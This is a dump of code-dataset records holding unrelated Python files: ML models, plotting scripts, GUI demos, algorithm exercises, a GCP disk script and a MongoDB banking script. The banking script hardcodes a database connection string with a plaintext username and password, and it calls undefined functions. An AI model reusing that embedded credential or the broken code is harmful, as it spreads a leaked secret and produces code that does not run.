__init__(self, model_path: Path, layer_sizes: List[int], learning_rate: float,\n actions_size: int, hidden_activation: str = \"relu\", mu_activation: str = \"tanh\",\n sigma_activation: str = \"softplus\",\n start_mu: float = 0.0, start_sigma: float = 1.0):\n \"\"\"Creates a new FFNN model to represent a policy. Implements all needed\n methods from tf.keras.Model.\n\n Args:\n model_path: Where to save the model and other training info\n layer_sizes: A list with the number of neurons on each hidden layer\n learning_rate: The training step size\n actions_size: The number of possible actions\n hidden_activation: Activation function for hidden layer neurons\n mu_activation: Activation function for mu\n sigma_activation: Activation function for sigma\n start_mu: The starting Mu value\n start_sigma: The starting Sigma value\n \"\"\"\n\n super(SimpleModel, self).__init__()\n self.model_path = model_path\n self.layer_sizes = layer_sizes\n self.output_size = actions_size\n self.learning_rate = learning_rate\n self.hidden_activation = hidden_activation\n self.mu_activation = mu_activation\n self.sigma_activation = sigma_activation\n self.start_mu = start_mu\n self.start_sigma = start_sigma\n\n self.hidden_layers = []\n for i in self.layer_sizes:\n self.hidden_layers.append(Dense(i, activation=self.hidden_activation,\n name=f\"hidden_{len(self.hidden_layers)}\"))\n\n self.mu = Dense(self.output_size, activation=self.mu_activation, name=\"dense_mu\",\n kernel_initializer=initializers.Constant(self.start_mu),\n bias_initializer=initializers.Zeros())\n self.sigma = Dense(self.output_size, activation=self.sigma_activation, name=\"dense_sigma\",\n kernel_initializer=initializers.Constant(self.start_sigma),\n bias_initializer=initializers.Zeros())\n\n self.optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n\n self.train_log_dir = Path(model_path, \"train_log\")\n self.summary_writer = tf.summary.create_file_writer(str(self.train_log_dir))\n\n def get_config(self):\n \"\"\"Used by tf.keras to load a saved model.\"\"\"\n return {\"layer_sizes\": self.layer_sizes,\n \"learning_rate\": self.learning_rate,\n \"output_size\": self.output_size,\n \"hidden_activation\": self.hidden_activation,\n \"mu_activation\": self.mu_activation,\n \"sigma_activation\": self.sigma_activation}\n\n @tf.function\n def call(self, inputs: tf.Tensor):\n \"\"\"See base Class.\"\"\"\n\n logger.info(\"[Retrace] call\")\n x = inputs\n for layer in self.hidden_layers:\n x = layer(x)\n mu = self.mu(x)\n sigma = self.sigma(x)\n\n return mu, sigma\n\n @tf.function\n def train_step(self, states: tf.Tensor, actions: tf.Tensor,\n weights: tf.Tensor) -> (Tuple[tf.Tensor], tf.Tensor, tf.Tensor):\n \"\"\"See base Class.\"\"\"\n\n logger.info(\"[Retrace] train_step\")\n with tf.GradientTape() as tape:\n mu, sigma = self(states)\n log_probabilities = self._get_log_probabilities(mu, sigma, actions)\n loss = -tf.reduce_mean(weights * log_probabilities)\n\n gradients = tape.gradient(loss, self.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))\n\n return (mu, sigma), loss, log_probabilities, gradients\n\n @tf.function\n def _get_log_probabilities(self, mu: tf.Tensor, sigma: tf.Tensor, actions: tf.Tensor) -> tf.Tensor:\n \"\"\"Gets the logarithmic probabilities of each action for each set of logits.\n\n Args:\n mu: The mean value for each action for each step\n sigma: The variance value for each action for each step\n actions: The actual actions used in each step\n\n Returns:\n The logarithmic probabilities for the actions\n \"\"\"\n\n logger.info(\"[Retrace] get_log_probabilities\")\n\n x1 = actions - mu\n x2 = x1 ** 2\n sigma2 = sigma ** 2\n x3 = x2 / sigma2\n logsigma = tf.math.log(sigma)\n x4 = x3 + (2 * logsigma)\n actions_sum = tf.reduce_sum(x4, axis=-1)\n x5 = actions_sum + self.output_size * tf.math.log(2 * math.pi)\n x6 = - x5 * 0.5\n log_probabilities = x6\n return log_probabilities\n\n @tf.function\n def produce_actions(self, states: tf.Tensor) -> tf.Tensor:\n \"\"\"Get a sample from the action probability distribution produced\n by the model, for each passed state.\n\n Args:\n states: The list of states representations\n\n Returns:\n The sampled action for each state\n \"\"\"\n\n logger.info(\"[Retrace] produce_actions\")\n mu, sigma = self(states)\n actions = tfp.distributions.Normal(mu, sigma).sample([1])\n return actions\n\n\ndef test():\n tf.config.run_functions_eagerly(True)\n tf.random.set_seed(0)\n model = SimpleModel(model_path=Path(\"experiments/tests\"),\n layer_sizes=[],\n learning_rate=0.1,\n actions_size=1,\n hidden_activation=\"tanh\",\n mu_activation=\"tanh\",\n sigma_activation=\"softplus\")\n\n state = np.array([[1.], [1.], [1.]])\n reward = np.array([0.5, 1., 0.2])\n\n actions = model.produce_actions(state)\n print(f\"actions train= {actions}\")\n\n (mu, sigma), loss, log_probabilities, gradients = model.train_step(state, actions, reward)\n print(f\"Mu = {mu}\")\n print(f\"Sigma = {sigma}\")\n print(f\"loss = {loss}\")\n print(f\"log_probabilities train= {log_probabilities}\")\n print(f\"gradients train= {gradients}\")\n pass\n\n\nif __name__ == '__main__':\n\n test()\n","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"301414878","text":"import numpy as np \nfrom os import listdir\nfrom os.path import isfile, join\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport torch\nimport seaborn as sns\n\nmypath = '../weights_sin2Reg/cifar10/'\nonlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\nlayers = []\nfor each in sorted(onlyfiles):\n layers.append(np.load(mypath+each).ravel())\n\n#layers.append(np.load(mypath+'/svhn_q/svhn_features0_quantized_wrpn.npy').ravel())\n#layers.append(np.load(mypath+'/svhn_q/svhn_classifier0_quantized_wrpn.npy').ravel())\n#layers.append(mypath+'/cifar10_conv2_quantized_wrpn.npy')\nprint(onlyfiles)\n\n# plot\nf, axes = plt.subplots(1, 6, figsize=(25, 5), sharex=False)\ncolor = \"b\"\n#sns.set()\n#sns.set(style=\"white\", palette=\"bright\", color_codes=True)\nsns.set(palette=\"bright\", color_codes=True)\n\n#plt.ylabel('counts')\n#sns.distplot( layers[0] , ax=axes[0], color=color, bins=100, kde=False, axlabel='epoch#')\nleft = -0.35\nright = 0.35\nplt.subplot(1, 6, 1)\n_ = plt.hist(layers[0], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 2)\n_ = plt.hist(layers[1], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 3)\n_ = plt.hist(layers[2], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 4)\n_ = plt.hist(layers[3], 50)\n#plt.xlim((left,right))\nplt.subplot(1, 6, 5)\n_ = plt.hist(layers[4], 50)\n#plt.xlim((left,right))\n#plt.xlim((left,right))\n#plt.xlim((-0.5, 0.5))\n#plt.savefig('examples/classifier_compression/figs/fig_sin2_bits-44444_cf_'+str(cf)+'_lr_'+str(lr)+'_TMP.png')\nplt.savefig('cifar10_sinreq-learn.png')\n","sub_path":"examples/classifier_compression/plotting/hist_plot_weights_3.py","file_name":"hist_plot_weights_3.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"544981789","text":"import sys\n\nfrom PyQt6.QtCore import QTimer, QDateTime\nfrom PyQt6.QtWidgets import QWidget, QListWidget, QLabel, QPushButton, QGridLayout, QApplication\n\n\nclass WinForm(QWidget):\n def __init__(self, parent=None):\n super(WinForm, self).__init__(parent)\n self.setWindowTitle(\"QTimer demo\")\n self.listFile = QListWidget()\n self.label = QLabel(\"显示当前时间\")\n self.startButton = QPushButton(\"开始\")\n self.endButton = QPushButton(\"结束\")\n layout = QGridLayout(self)\n\n # 初始化定时器\n self.timer = QTimer(self)\n # 显示时间\n self.timer.timeout.connect(self.showTime) # timeout 信号连接到特定的槽,当定时器超时,发出 timeout 信号\n\n layout.addWidget(self.label, 0, 0, 1, 2)\n layout.addWidget(self.startButton, 1, 0)\n layout.addWidget(self.endButton, 1, 1)\n\n self.startButton.clicked.connect(self.start_timer)\n self.endButton.clicked.connect(self.end_timer)\n\n self.setLayout(layout)\n\n def showTime(self):\n # 获取当前系统时间\n time = QDateTime.currentDateTime()\n # 设置时间格式\n timeDisplay = time.toString(\"yyyy-MM-dd hh:mm:ss dddd\")\n self.label.setText(timeDisplay)\n\n def start_timer(self):\n # 设置时间间隔并启动定时器\n self.timer.start(1000) # start 内设置时间间隔,启动或重新启动计时器,如果计时器在运行,则重启\n self.startButton.setEnabled(False)\n self.endButton.setEnabled(True)\n\n def end_timer(self):\n self.timer.stop() # 停止计时器\n self.startButton.setEnabled(True)\n self.endButton.setEnabled(False)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = WinForm()\n form.show()\n sys.exit(app.exec())\n","sub_path":"src/pyside_demo/qtimer_demo.py","file_name":"qtimer_demo.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598949673","text":"#!/usr/bin/python3.6.9\nfrom pymongo import MongoClient\nimport sys\n\nglobal dOut\n\n\ndef connectDB(myDB):\n try:\n connection = MongoClient(myDB)\n return connection\n except:\n sendResult(\"Connect Error\")\n\n\ndef closeConnect(connection):\n try:\n connection.close()\n except:\n sendResult(\"Close Error\")\n\n\ndef cashflow(myDB):\n try:\n bConnect = connectDB(myDB)\n\n baccs = bConnect.cisbank.baccs\n moves = bConnect.cisbank.moves\n\n bQuery = {'bAlias': bId}\n mQuery = {'mCode': mId}\n bacc = baccs.find_one(bQuery)\n move = moves.find_one(mQuery)\n if move['mSign']:\n newBalance = bacc['bBalance'] + move['mAmmount']\n else:\n newBalance = bacc['bBalance'] - move['mAmmount']\n\n oldB = bacc['bBalance']\n\n newMoves = []\n\n newMoves.extend(bacc['bMoves'])\n newMoves.append(mId)\n\n mOld = {\"$set\": {\"mOld\": bacc['bBalance']}}\n mNew = {\"$set\": {\"mNew\": newBalance}}\n\n bBalance = {\"$set\": {\"bBalance\": newBalance}}\n bMoves = {\"$set\": {\"bMoves\": newMoves}}\n\n baccs.update_one(bQuery, bBalance)\n baccs.update_one(bQuery, bMoves)\n\n moves.update_one(mQuery, mOld)\n moves.update_one(mQuery, mNew)\n\n closeConnect(bConnect)\n status = True\n return status\n\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n sendResult(message)\n status = False\n return status\n\n\ndef totalizeMonths(tId, mId, myDB):\n try:\n tConnect = connectDB(myDB)\n\n moves = tConnect.cisbank.moves\n mtaccs = tConnect.cisbank.mtaccs\n\n mQuery = {'mCode': mId}\n move = moves.find_one(mQuery)\n\n mtQuery = {'tName': tId}\n mtacc = mtaccs.find_one(mtQuery)\n\n newBalance = mtacc['tBalance'] + move['mAmmount']\n mtBalance = {\"$set\": {\"tBalance\": newBalance}}\n\n mtaccs.update_one(mtQuery, mtBalance)\n closeConnect(tConnect)\n status = True\n return status\n\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n sendResult(message)\n status = False\n return status\n\n\ndef sendResult(dOut):\n print(dOut)\n sys.stdout.flush()\n\n\ndef main():\n #myDB = \"mongodb://localhost:27017/cisbank\"\n myDB = \"mongodb://angeloacr:cisbankDataBase47@ds051595.mlab.com:51595/cisbank\"\n\n bId = sys.argv[1]\n tId = sys.argv[2]\n mId = sys.argv[3]\n #mDate = sys.argv[4]\n statusB = updateB(bId, mId, myDB)\n statusT = updateT(tId, mId, myDB)\n #statusM = totalizeMove(mDate, mId, myDB)\n statusA = totalizeMonths(tId, mId, myDB)\n if statusB and statusT and statusM:\n sendResult(\"Success\")\n else:\n sendResult(\"Error\")\n\n\n# if __name__ == \"__main__\":\n # sendResult(\"Init\")\nmain()\n","sub_path":"cisbankServer/python/balancestatus.py","file_name":"balancestatus.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42091632","text":"import argparse\nimport os\nimport time\n\nimport googleapiclient.discovery\nfrom oauth2client.client import GoogleCredentials\n\n# [START list_disks]\ndef list_disks (compute, PROJECT, d_zone):\n result = compute.disks().list(PROJECT=PROJECT, d_zone=d_zone).execute()\n return result['items'] if 'items' in result else None\n# [END list_disks]\n\n# [START disk_attach]\ndef disk_attach(compute, PROJECT, d_zone, vm_name):\n config = {\n 'source': \"/compute/v1/projects/\"+str(PROJECT)+\"/zones/\"+str(d_zone)+\"/disks\"+str(vm_name)\n }\n return compute.instances().attachDisk(\n project=PROJECT,\n zone=d_zone,\n instance=vm_name,\n body=config\n )\n# [END disk_attach]\n\n# [START disks_creation]\ndef disks_creation(compute, PROJECT, d_zone, d_name, d_type, d_size):\n config = {\n 'name' : d_name,\n 'type' : d_type,\n 'sizeGB' : d_size,\n }\n return compute.disks().insert(PROJECT=PROJECT, d_zone=d_zone, body=config).execute()\n# [END disks_creation]\n\n# [START wait_for_operation]\ndef wait_for_operation(compute, PROJECT, d_zone, operation):\n print('Waiting for operation to finish...')\n while True:\n result = compute.d_zoneOperations().get(\n PROJECT=PROJECT,\n d_zone=d_zone,\n operation=operation).execute()\n\n if result['status'] == 'DONE':\n print(\"done.\")\n if 'error' in result:\n raise Exception(result['error'])\n return result\n\n time.sleep(1)\n# [END wait_for_operation]\n\nPROJECT = os.environ['GCLOUD_PROJECT']\nBUCKET = os.environ['CLOUD_STORAGE_BUCKET']\n\n# [START run] \ndef main():\n #reading the options from cfg file\n file = open(\"test.cfg\",\"r\")\n options=list(file.readlines())\n for obj in options:\n if 'VM' in obj:\n if 'name' in obj:\n a, vm_name=str.split(obj,'=')\n if 'Disk' in obj:\n if 'name' in obj:\n a, d_name=str.split(obj,'=')\n if 'type' in obj:\n a, d_type=str.split(obj,'=')\n if 'size' in obj:\n a, d_size=str.split(obj,'=')\n if 'zone' in obj:\n a, d_zone=str.split(obj,'=')\n\n compute = googleapiclient.discovery.build('compute','v1')\n\n print('Creating instance.')\n\n operation = disks_creation(compute, PROJECT, d_zone, d_name, d_type, d_size)\n wait_for_operation(compute, PROJECT, d_zone, operation['name'])\n\n disks = list_disks(compute, PROJECT, d_zone)\n\n operation = disk_attach(compute, PROJECT, d_zone, vm_name)\n wait_for_operation(compute, PROJECT, d_zone, operation['name'])\n print('Disks in PROJECT %s and d_zone %s:' % (PROJECT, d_zone))\n for disk in disks:\n print(' - ' + disk['name'])\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__,formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('PROJECT_id', help='Your Google Cloud PROJECT ID.')\n parser.add_argument('bucket_name', help='Your Google Cloud Storage bucket name.')\n parser.add_argument('--d_zone', default='us-central1-f', help='Compute Engine d_zone to deploy to.')\n parser.add_argument('--size' , default='10GB', help='Size of the disk')\n parser.add_argument('--type' , default='pd-standard', help='Type of the disk')\n parser.add_argument('--name', default='demo-instance', help='New instance name.')\n args = parser.parse_args()\n main()\n# [END run]\n","sub_path":"automation_api/create_disks.py","file_name":"create_disks.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635307619","text":"from exceptions import Empty\n\nclass ArrayQueue:\n\t\n\tdef __init__(self):\n\t\tself._data = [] \n\t\tself._size = 0\n\t\tself._front = 0\n\t\t\n\tdef __len__(self):\n\t\treturn self._size\n\t\n\tdef is_empty(self):\n\t\treturn self._size ==0\n\t\n\tdef enqueue(self, e):\n\t\tself._data.append(e)\n\t\tself._size = self._size+1\n\t\n\tdef dequeue(self):\n\t\tif self.is_empty():\n\t\t\traise Empty('Queue is Empty')\n\t\tvalue = self._data[self._front]\n\t\tself._data[self._front] = None\n\t\tself._front = self._front+1\n\t\tself._size = self._size-1\n\t\treturn value\n\t\n\tdef first(self):\n\t\tif self.is_empty():\n\t\t\traise Empty('Queue is empty')\n\t\treturn self._data[self._front]\n\t\t\nq = ArrayQueue()\nq.enqueue(10)\nq.enqueue(20)\nq.enqueue(30)\nq.enqueue(50)\nprint('Queue is :' , q._data)\n\t\t\n\t\t","sub_path":"arrayqueue.py","file_name":"arrayqueue.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"121275538","text":"\ndef read_matrix():\n\tsudoku_length = 9\n\tmatrix = [[int(x) for x in input().split()] for y in range(sudoku_length)]\n\treturn matrix\n\n\ndef validate_sudoku(matrix):\n\t# Validación por filas\n\tfor i in range(9):\n\t\toccur = [False for i in range(10)]\n\t\tfor j in range(9):\n\t\t\tif occur[matrix[i][j]]:\n\t\t\t\treturn False\n\t\t\toccur[matrix[i][j]] = True\n\t\t\t\n\t# Validación por columnas\n\tfor j in range(9):\n\t\toccur = [False for i in range(10)]\n\t\tfor i in range(9):\n\t\t\tif occur[matrix[i][j]]:\n\t\t\t\treturn False\n\t\t\toccur[matrix[i][j]] = True\n\t\n\t# Validación por grillas\n\tfor i in range(3):\n\t\tfor j in range(3):\n\t\t\toccur = [False for i in range(10)]\n\t\t\tfor k in range(3):\n\t\t\t\tfor l in range(3):\n\t\t\t\t\tif occur[matrix[i * 3 + k][j * 3 + l]]:\n\t\t\t\t\t\treturn False\n\t\t\t\t\toccur[matrix[i * 3 + k][j * 3 + l]] = True\n\n\treturn True\n\n\ndef run():\n\tprint(\"Ingrese el sudoku: \")\n\n\tgrid = read_matrix()\n\n\tis_valid = validate_sudoku(grid)\n\n\tif(is_valid):\n\t\tprint(\"El sudoku ingresado es correcto\")\n\telse:\n\t\tprint(\"El sudoku ingresado es incorrecto\")\n\n\nif __name__ == \"__main__\":\n\trun()\n\n\n# 7 4 3 9 5 1 6 8 2\n# 1 6 2 4 8 7 3 9 5\n# 9 5 8 6 3 2 7 1 4\n# 2 1 9 8 7 3 5 4 6\n# 3 7 4 5 6 9 1 2 8\n# 5 8 6 1 2 4 9 7 3\n# 4 9 5 2 1 6 8 3 7\n# 8 2 7 3 9 5 4 6 1\n# 6 3 1 7 4 8 2 5 9","sub_path":"semana_01/codigos/ejercicio_03.py","file_name":"ejercicio_03.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"451856459","text":"#Problem 2: https://leetcode.com/problems/meeting-rooms-ii/\n#Time Complexity: O(n.logn)\n#Space Complexity: O(n)\n#Approach- low-0th element , high=last element, find mid ,perform Binary Search by computing number of elements less than mid, moving low and high\n#pointers accordingly.\nclass Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n #edge case\n if not intervals:\n return 0\n #put start and end timings in different array\n start_timing=[]\n end_timing=[]\n for i in range(len(intervals)):\n start_timing.append(intervals[i][0])\n for i in range(len(intervals)):\n end_timing.append(intervals[i][1])\n \n #sort them\n start_timing.sort()\n print(start_timing)\n end_timing.sort()\n print(end_timing)\n \n start_ptr=0\n end_ptr=0\n rooms=0\n \n while start_ptr=end_timing[end_ptr]:\n rooms-=1\n end_ptr+=1\n rooms+=1\n start_ptr+=1\n return rooms\n ","sub_path":"Problem2_Meeting Rooms.py","file_name":"Problem2_Meeting Rooms.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"279159961","text":"import sys\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom scipy.constants import codata\nfrom scipy import integrate\nmpl.rcParams['text.usetex'] = True\nmpl.rcParams['text.latex.preview'] = True\nif len(sys.argv) < 2:\n print(\"Please inform the filename.\")\n exit(1)\nfname = sys.argv[1]\ntry:\n data = np.loadtxt(fname, dtype='float')\nexcept IOError:\n print(\"File '%s' does not exit.\",fname)\n exit(1)\n# scientific constants\nc = codata.value('speed of light in vacuum') * 100 # cgs\nh = codata.value('Planck constant') * 1e7 # cgs\nk = codata.value('Boltzmann constant') * 1e7 # cgs\nMsun = 1.9885e33 # solar mass cgs\nl_sun = 3.828e+33\nk230 = 0.005\na = float(2)\nlambda_0 = float(200e-4) # cgs\nN = np.ones(3)\n# fitting curve\ndef fbb(freq, Td, b):\n wavelength = c / freq\n exp1 = 1 - np.exp(- ((lambda_0/wavelength)**b))\n exp2 = np.exp(h*freq/k/Td) - 1\n return 2 * h * exp1 * freq**3 / exp2 / c**2\ndef f(freq, Td, b):\n wavelength = c / freq\n lambda_c = 1 / ((26.6764 + 6.24629*a)**-2 + (1.90530e-04 + 7.24277e-05*a)*Td) * 1e-4\n freq_c = c / lambda_c\n power = ((wavelength/lambda_c)**a) * np.exp(- (wavelength/(lambda_c*3/4))**2)\n return fbb(freq,Td, b) + fbb(freq_c, Td, b)*power\ndef mass(freq, flux, Td, b, mpc):\n logk = np.log(k230) + b*np.log(freq/230e9)\n logM = -np.log(1e23) + np.log(flux) + 2*np.log(mpc) - logk - np.log(2*h*(freq**3)/(c**2)) - np.log(np.exp(h*freq/k/Td)-1) - np.log(Msun) - np.log(1+z)\n return logM / np.log(10)\n# data\nz = data[:,1] # redshift\nd = data[:,2]*3.086e+24 # luminosity distance: Mpc \ny = data[:,3]*1e-6 # Jy\ny_err = data[:,4]*1e-6\nt = np.array([29.68, 43.37, 34.42, 34.98, 34.69, 39.97, 42.67, 35.63, 33.06])\nt_err = np.array([1.55, 1.21, 0.64, 0.49, 0.88, 0.69, 3.03, 0.63, 0.22])\nb_est = np.array([1.27, 1.39, 1.33, 1.64, 1.33, 1.32, 1.32, 1.44, 1.79])\nb_err = np.array([0.13, 0.04, 0.04, 0.03, 0.05, 0.03, 0.11, 0.04, 0.02])\nup = c / 8.0e-4\nlow = c / 1000.0e-4\n# calculation\nT0 = np.average(t, weights=(1/t_err))\nT0_err = np.sum(t_err)/np.sqrt(len(t_err))\nb0 = np.average(b_est, weights=(1/b_err))\n#b_err = np.sum(b_err)/np.sqrt(len(b_err))\nx = 343.5e9 * (1+z)\nN = y / f(x, T0, b0)\nIR = N * integrate.quad(f, low, up, args=(T0, b0))[0] * 4 * np.pi * d**2 * 1e-23 / (l_sun)\nIR_up = N * integrate.quad(f, low, up, args=(T0+T0_err, b0))[0] * 4 * np.pi * d**2 * 1e-23 / (l_sun)\nIR_do = N * integrate.quad(f, low, up, args=(T0-T0_err, b0))[0] * 4 * np.pi * d**2 * 1e-23 / (l_sun)\nsfr = IR * 1.7e-10\nsfr_up = IR_up * 1.7e-10\nsfr_do = IR_do * 1.7e-10\nM = mass(x, y, T0, b0, d)\nprint(b0)\nprint(T0, T0_err)\nprint(IR)\nprint(IR_up-IR)\nprint(IR-IR_do)\nprint(sfr)\nprint(sfr_up-sfr)\nprint(sfr-sfr_do)\nprint(M)\nyerr0 = y_err[0]\npt = np.arange(4., 1200., 1) * 1e-4\nplt.plot(c/x[0]*1e4, y[0], 'bo', label='data')\nplt.errorbar(c/x[0]*1e4, y[0], yerr=yerr0, fmt='bo')\nplt.plot(pt*1e4, N[0]*f(c/pt, T0, b0), 'r-', label='Casey')\nplt.fill_between(pt*1e4, N[0]*f(c/pt, T0-T0_err, b0), N[0]*f(c/pt, T0+T0_err, b0), color='grey', alpha=0.2)\nplt.ylabel(r'$Flux\\,(Jy)$', fontsize='large')\nplt.xlabel(r'$Wavelength\\,(\\mu m)$', fontsize='large')\nplt.yscale('log')\nplt.xscale('log')\nplt.title('IR SED of GRB 080607')\nplt.legend(loc='upper right', fontsize='medium', handletextpad=0.1)\nplt.grid(True)\nplt.show()","sub_path":"final/grb.py","file_name":"grb.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"446150833","text":"from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.relativelayout import RelativeLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.label import Label\nfrom kivy.uix.textinput import TextInput\nfrom kivy.lang import Builder\nfrom kivy.uix.screenmanager import ScreenManager, Screen\n\nBuilder.load_string(\"\"\"\n:\n RelativeLayout:\n size: 600,600\n Label:\n text: \"Title\"\n color: [0,1,0,1]\n font_size: 150\n Label:\n text: \"Random\"\n pos: -400,0\n Button:\n text: \"Button\"\n size: 1,1\n pos: 0,200\n\n\n\n\"\"\")\n\n\nclass Menu(Screen):\n pass\n\nsm = ScreenManager()\nsm.add_widget(Menu(name='menu'))\n\n\nclass UserInterface(App):\n\n def build(self):\n return sm;\n\n\n\nif __name__ == '__main__':\n UserInterface().run()","sub_path":"currentinterface.py","file_name":"currentinterface.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"552289387","text":"import os\nfrom setuptools import find_packages, setup\n\n\ndef get_package_data():\n ''' Find all additional package data to distribute with code. '''\n\n baseline_images = ['tests/baseline_images/%s/*' % x\n for x in os.listdir('ggplot/tests/baseline_images')]\n\n return {'ggplot': baseline_images + [\"exampledata/*.csv\", \"geoms/*.png\"]}\n\n\ndef get_readme():\n ''' Retrieve README.rst's content in a safe way. '''\n with open('README.rst') as f:\n return f.read()\n\n\nsetup(name=\"ggplot\",\n version=\"0.3.0\",\n author=\"Greg Lamp\",\n author_email=\"greg@yhathq.com\",\n url=\"https://github.com/yhat/ggplot/\",\n license=\"BSD\",\n packages=find_packages(),\n package_dir={\"ggplot\": \"ggplot\"},\n package_data=get_package_data(),\n description=\"ggplot for python\",\n long_description=get_readme(),\n install_requires=[\"pandas\", \"matplotlib\", \"scipy\", \"statsmodels\",\n \"patsy\"],\n classifiers=['Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Scientific/Engineering',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3'],\n zip_safe=False)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217253092","text":"\"\"\"\nWord Count Engine\nImplement a document scanning function wordCountEngine, which receives a string document and returns a list of all unique words in it and their number of occurrences, sorted by the number of occurrences in a descending order. If two or more words have the same count, they should be sorted according to their order in the original sentence. Assume that all letters are in english alphabet. You function should be case-insensitive, so for instance, the words “Perfect” and “perfect” should be considered the same word.\n\nThe engine should strip out punctuation (even in the middle of a word) and use whitespaces to separate words.\n\nAnalyze the time and space complexities of your solution. Try to optimize for time while keeping a polynomial space complexity.\n\nExamples:\ninput: document = \"Practice makes perfect. you'll only\n get Perfect by practice. just practice!\"\n\noutput: [ [\"practice\", \"3\"], [\"perfect\", \"2\"],\n [\"makes\", \"1\"], [\"youll\", \"1\"], [\"only\", \"1\"], \n [\"get\", \"1\"], [\"by\", \"1\"], [\"just\", \"1\"] ]\nImportant: please convert the occurrence integers in the output list to strings (e.g. \"3\" instead of 3). We ask this because in compiled languages such as C#, Java, C++, C etc., it’s not straightforward to create mixed-type arrays (as it is, for instance, in scripted languages like JavaScript, Python, Ruby etc.). The expected output will simply be an array of string arrays.\n\nConstraints:\n[time limit] 5000ms\n[input] string document\n[output] array.array.string\n\"\"\"\n# Time complexity: O(N)\n# Space complexity: O(N)\nimport collections\ndef word_count_engine(document):\n punct = \"!@#$%^&*(),./;':\\\"[]{}?<>~\"\n formatted = [process(word, punct) for word in document.split()]\n count = collections.defaultdict(int)\n for word in formatted:\n if word: count[word] += 1\n \n ordered_by_freq = collections.defaultdict(list)\n for word in formatted:\n if word in count:\n ordered_by_freq[count[word]].append(word)\n del count[word]\n \n output = []\n for i in reversed(range(len(formatted))):\n if i in ordered_by_freq:\n for word in ordered_by_freq[i]:\n output.append([word, str(i)])\n return output\n \ndef process(word, punct):\n temp = [c for c in word.lower() if c not in punct]\n return \"\".join(temp)\n","sub_path":"Interviews/Pramp: Word Count Engine.py","file_name":"Pramp: Word Count Engine.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"58964183","text":"from rdflib import Literal\nfrom .namespaces import TAG, OWL, SKOS, BRICK, RDFS\n\n\"\"\"\nSet up subclasses of the equipment superclass\n\"\"\"\nequipment_subclasses = {\n \"HVAC\": {\n OWL.equivalentClass: BRICK[\"Heating_Ventilation_Air_Conditioning_System\"],\n \"tags\": [TAG.Heat, TAG.Ventilation, TAG.Air, TAG.Conditioning, TAG.System],\n },\n \"Heating_Ventilation_Air_Conditioning_System\": {\n OWL.equivalentClass: BRICK[\"HVAC\"],\n \"tags\": [TAG.HVAC],\n },\n \"Weather\": {\"tags\": [TAG.Weather]},\n \"Electrical_System\": {\n \"tags\": [TAG.Electrical, TAG.System],\n \"subclasses\": {\n \"Emergency_Power_Off_System\": {\n \"tags\": [TAG.Emergency, TAG.Power, TAG.Off, TAG.Equipment],\n },\n \"Energy_Storage\": {\n \"tags\": [TAG.Energy, TAG.Storage, TAG.Equipment],\n \"subclasses\": {\n \"Battery\": {\n \"tags\": [TAG.Battery, TAG.Energy, TAG.Storage, TAG.Equipment],\n },\n },\n },\n \"Inverter\": {\"tags\": [TAG.Inverter, TAG.Equipment]},\n \"PlugStrip\": {\"tags\": [TAG.PlugStrip, TAG.Equipment]},\n },\n },\n \"Meter\": {\n \"tags\": [TAG.Meter, TAG.Equipment],\n \"subclasses\": {\n \"Electrical_Meter\": {\n \"tags\": 